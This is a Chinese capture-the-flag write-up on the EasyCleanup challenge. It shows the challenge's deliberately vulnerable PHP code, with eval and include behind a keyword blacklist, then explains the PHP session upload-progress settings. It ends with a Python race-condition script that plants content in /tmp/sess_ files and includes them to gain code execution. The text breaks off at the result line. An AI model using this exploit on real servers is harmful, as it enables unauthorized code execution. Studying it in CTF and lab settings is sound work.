从[第五空间 2021]EasyCleanup认识php_session
进入题目:源代码
15 | filter($shell) | checkNums($shell)) exit("hacker");
eval($shell);
}
if(isset($_GET['file'])){
if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker");
include $_GET['file'];
}
function filter($var){
$banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"];
foreach($banned as $ban){
if(strstr($var, $ban)) return True;
}
return False;
}
function checkNums($var){
$alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';
$cnt = 0;
for($i = 0; $i < strlen($alphanum); $i++){
for($j = 0; $j < strlen($var); $j++){
if($var[$j] == $alphanum[$i]){
$cnt += 1;
if($cnt > 8) return True;
}
}
}
return False;
}
?>源代码中可以进行参数shell的文件执行,会参数file的文件包含,但是限制了字符,并且对a-z0-9A-Z进行了匹配,存在就exit(),要绕过这些匹配进行shell的rce执行,自己好像没有什么办法,先看看phpinfo()的内容。
![从[第五空间 2021]EasyCleanup认识php_session_第1张图片](http://img.e-com-net.com/image/info8/671e19f757db477ea0b483d658bb9351.jpg)
关键点在于:
1,session.save_handler files files
2,session.save_path /tmp /tmp
3,session.serialize_handler php php
4,session.upload_progress.cleanup On On
5,session.upload_progress.enabled On On
6,session.upload_progress.freq 1% 1%
7,session.upload_progress.min_freq 1 1
8,session.upload_progress.name PHP_SESSION_UPLOAD_PROGRESS PHP_SESSION_UPLOAD_PROGRESS
9,session.upload_progress.prefix upload_progress_ upload_progress_
10,session.use_cookies On On
11,session.use_only_cookies On On
12,session.use_strict_mode Off Off第一行表示session以文件的形式存储。
第二行表示session存储目录在/tmp下。
第三行表示反序列化和序列号的处理器是PHP。
第五行表示upload_progress功能启动,即浏览器向服务器上传文件时,php会把此次文件上传的详细信息存储在session中。
第四行表示文件上传结束后,php会立即清除对应session文件中的内容。
第六七行中的freq 和 min_freq 两项用来设置服务器端对进度信息的更新频率。合理的设置这两项可以减轻服务器的负担。
第八九行中的prefix 和 name 两项用来设置进度信息在session中存储的变量名/键名。
第十行表示使用cookie记录sessionid。
第十一行表示是否在客户端仅仅使用 cookie 来存放会话 ID。
第十二行中的值为off,表示Cookie中的sessionid可控。
解题思路:
当我们自己定义Cookie中的PAPSESSID时,PHP为在服务器创建文件并存储在tmp/sess_id。服务器会自动初始化Session,由(prefix+session.upload_progress.name)组成,由于十二行为off,可以自定义cookie存储session文件,然后控制文件的内容,进行file的文件包含,因为cleanup是开启的,所以需要使用条件竞争,在php为清除掉时,就访问临时tmp/sess_id文件包含进去。
即传输这样的内容:![从[第五空间 2021]EasyCleanup认识php_session_第2张图片](http://img.e-com-net.com/image/info8/5f044b07cf594a3a8f1c080d680f2547.jpg)
脚本:
import requests
import threading
myurl = 'http://1.14.71.254:28736/index.php'
sessid = '1a1'
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": ""}
mycookie = {'PHPSESSID': sessid}
proxies = {
"http": "127.0.0.1:8080",
}
def send_file(session):
while True:
resp = requests.post(url=myurl, data=writedata, files={'file': ('1.txt', 123)}, cookies=mycookie)
def getflag(session):
while True:
payload_url = myurl + '?file=' + '/tmp/sess_' +sessid
resp = requests.get(url=payload_url)
if 'upload_progress' in resp.text:
print(resp.text)
break
if __name__ == '__main__':
session = requests.session()
t = threading.Thread(target=send_file, args=(session,))
t.start()
getflag(session)
得到结果: